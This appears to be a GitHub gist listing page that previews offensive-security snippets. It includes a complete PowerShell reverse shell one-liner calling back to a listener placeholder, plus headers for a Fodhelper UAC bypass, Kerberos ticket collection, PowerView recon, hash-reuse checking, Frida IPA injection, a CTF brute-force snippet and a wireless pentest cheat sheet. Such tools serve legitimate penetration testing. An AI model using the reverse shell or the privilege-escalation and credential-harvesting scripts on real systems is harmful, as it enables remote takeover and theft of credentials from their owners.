ICheer_No0M icheernoom

@ohpe
ohpe / RS.ps1
Last active October 14, 2024 19:46
PowerShell Reverse Shell
powershell -nop -exec bypass -c "$client = New-Object System.Net.Sockets.TCPClient('<LISTENERIP>',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
@bandrel
bandrel / check_hashes.py
Last active November 5, 2024 06:12
To check for and reveal AD user accounts that share passwords using a hashdump from a Domain Controller
#!/usr/bin/env python3
#Purpose: To check for and reveal AD user accounts that share passwords using a hashdump from a Domain Controller
#Script requires a command line argument of a file containing usernames/hashes in the format of user:sid:LMHASH:NTLMHASH:::
# ./check_hashes.py <hash_dump>
import argparse
import re
parser = argparse.ArgumentParser(description="Check user hashes against each other to find users that share passwords")
@FrankSpierings
FrankSpierings / ipa-resign.sh
Last active September 2, 2025 19:34
IPA Resigning (Frida Injection) Script (OSX)
#!/bin/bash
#
# Script requires `brew`
# - `/usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"`
#
# Variables
# - $IPA -> Source IPA
# - $MOBILEPROVISION -> Source embedded.mobileprovision
# find ~/Library/Developer/Xcode | grep embedded.mobileprovision
@jaredcatkinson
jaredcatkinson / Get-KerberosTicketGrantingTicket.ps1
Last active July 19, 2025 16:52
Kerberos Ticket Granting Ticket Collection Script and Golden Ticket Detection Tests
function Get-KerberosTicketGrantingTicket
{
<#
.SYNOPSIS
Gets the Kerberos Ticket Granting Tickets from all Logon Sessions
.DESCRIPTION
Get-KerberosTicketGrantingTicket uses the Local Security Authority (LSA) functions to enumerate Kerberos logon sessions and return their associated Kerberos Ticket Granting Tickets.
@HarmJ0y
HarmJ0y / PowerView-3.0-tricks.ps1
Last active October 30, 2025 19:54
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
@netbiosX
netbiosX / FodhelperUACBypass.ps1
Last active September 24, 2025 20:26
Bypass UAC via Fodhelper binary in Windows 10 systems
<#
.SYNOPSIS
This script can bypass User Access Control (UAC) via fodhelper.exe
 
It creates a new registry structure in: "HKCU:\Software\Classes\ms-settings\" to perform UAC bypass and starts
an elevated command prompt.
 
.NOTES
Function : FodhelperUACBypass
File Name : FodhelperUACBypass.ps1
@Mcostart
Mcostart / mn-scanner.py
Created January 23, 2017 02:09
Automate network scanning tasks using the nmap and masscan tools.
#!/usr/bin/python
import xml.etree.ElementTree as ET
import subprocess
import time
import os
#http://xael.org/pages/python-nmap-en.html
import nmap
def parseMasscanReport(path):
hostsPorts = {}
import urllib
import urllib2
url = 'http://gap.chal.ctf.westerns.tokyo/login.php'
flag = 'TWCTF{'
table = 'abcdefghijklmnopqrstuvwlyz'
table += table.upper()
table += '_{}'
@dogrocker
dogrocker / Wireless Penetration Testing Cheat Sheet.md
Created July 2, 2016 18:30
Wireless Penetration Testing Cheat Sheet

# Wireless Penetration Testing Cheat Sheet

## WIRELESS ANTENNA

  • Open the Monitor Mode
root@uceka:~# ifconfig wlan0mon down
root@uceka:~# iwconfig wlan0mon mode monitor
root@uceka:~# ifconfig wlan0mon up
@superkojiman
superkojiman / soocat.sh
Created June 10, 2016 15:51
Quick function to run a binary under socat
# Add to .bashrc
# You're welcome
function soocat {
socat tcp-l:${2},reuseaddr,fork EXEC:${1}
}